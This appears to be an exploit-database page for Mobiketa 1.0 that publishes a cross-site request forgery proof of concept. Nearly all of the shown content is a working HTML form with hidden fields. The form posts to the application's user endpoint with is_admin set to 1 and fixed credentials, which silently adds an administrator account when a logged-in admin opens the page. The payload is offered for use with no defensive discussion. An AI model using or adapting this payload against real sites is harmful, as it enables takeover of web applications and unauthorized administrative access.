[] NeoSense
E X P L O I T S
title author type platform port cve id

Mobiketa 1.0 - Cross-Site Request Forgery (Add Admin)

Author: Murat Yilmazlar
type: webapps
platform: php
port: 80.0
date_added: 2016-06-10 
date_updated: 2016-09-10 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
<!--
# Exploit Title: Mobiketa - CSRF Add Admin Exploit
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://www.ynetinteractive.com/mobiketa/
# Version: 1.0

# Exploit:

< -- bug code started -- >
-->

<html>
  <body>
    <form action="[SITE]/[mobiketa_path]/index.php?url=user" method="POST"
enctype="multipart/form-data">
      <input type="hidden" name="is&#95;admin" value="1" />
      <input type="hidden" name="name" value="murat&#32;y" />
      <input type="hidden" name="email"
value="murrat&#64;protonmail&#46;com" />
      <input type="hidden" name="username" value="murrat" />
      <input type="hidden" name="password" value="123123123" />
      <input type="hidden" name="id" value="15" />
      <input type="hidden" name="update" value="&#13;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<!--
< -- end of the bug code -- >

#########################

[+] Contact: http://twitter.com/muratyilmazlarr
-->
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.